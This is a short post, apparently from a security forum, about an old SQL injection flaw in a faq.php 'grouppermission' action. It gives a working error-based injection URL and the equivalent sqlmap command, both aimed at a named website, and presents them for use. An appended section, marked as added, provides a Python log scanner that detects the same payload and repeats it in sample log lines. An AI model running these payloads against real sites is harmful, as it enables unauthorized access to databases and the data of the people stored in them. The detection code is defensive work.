This is an old vulnerability, so I won't describe it in detail.

 

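Compared with the database-dumping tools circulating online, sqlmap is more flexible, more reliable, more stable, and more efficient.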

 

Exploit:

http://7kb.org/faq.php?action=grouppermission&gids[99]='&gids[100][0]=) and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a)%23

The equivalent sqlmap command is:

sqlmap.py -u "http://www.7kb.org/faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)" --technique=E -p gids[100][0]
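
For defenders, a log check for the request shown above, added here as an example that is not part of the original post: it flags `faq.php?action=grouppermission` requests whose `gids[...]` values are not plain integers and marks those carrying the error-based markers from the payload. The log lines, IP addresses and function names are constructed for illustration, and it assumes legitimate group IDs are always decimal integers.

```python
import re
from urllib.parse import urlsplit, parse_qsl

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
GIDS_KEY_RE = re.compile(r"^gids(\[[^\]]*\])+$")  # gids[99], gids[100][0], ...
# Markers of the error-based payload in the post (duplicate-key error via floor(rand())).
ERROR_BASED_RE = re.compile(r"floor\s*\(\s*rand\s*\(|information_schema|concat\s*\(", re.I)

def classify(line):
    """Return None, 'non-numeric-gids' or 'error-based-sqli' for one access-log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if not url.path.lower().endswith("/faq.php"):
        return None
    params = parse_qsl(url.query, keep_blank_values=True)  # also URL-decodes
    if ("action", "grouppermission") not in params:
        return None
    verdict = None
    for key, value in params:
        # Assumption: legitimate group IDs are plain decimal integers.
        if not GIDS_KEY_RE.match(key) or re.fullmatch(r"[0-9]+", value):
            continue
        if ERROR_BASED_RE.search(value):
            return "error-based-sqli"
        verdict = "non-numeric-gids"
    return verdict

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = ((n, classify(l)) for n, l in enumerate(lines, 1))
    return [(n, v) for n, v in hits if v]

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "GET /faq.php?action=grouppermission HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%23 HTTP/1.1" 200 830',
    '203.0.113.9 - - [01/Jan/2024:10:00:09 +0000] "GET /faq.php?action=grouppermission&gids[99]=%27&gids[100][0]=) HTTP/1.1" 200 790',
    '198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET /faq.php?action=grouppermission&gids[1]=5 HTTP/1.1" 200 5200',
]

if __name__ == "__main__":
    for n, v in scan(SAMPLE_LOG):
        print(n, v)
```

Only query strings are inspected, so parameters sent in a POST body need the same check applied at the application or WAF layer.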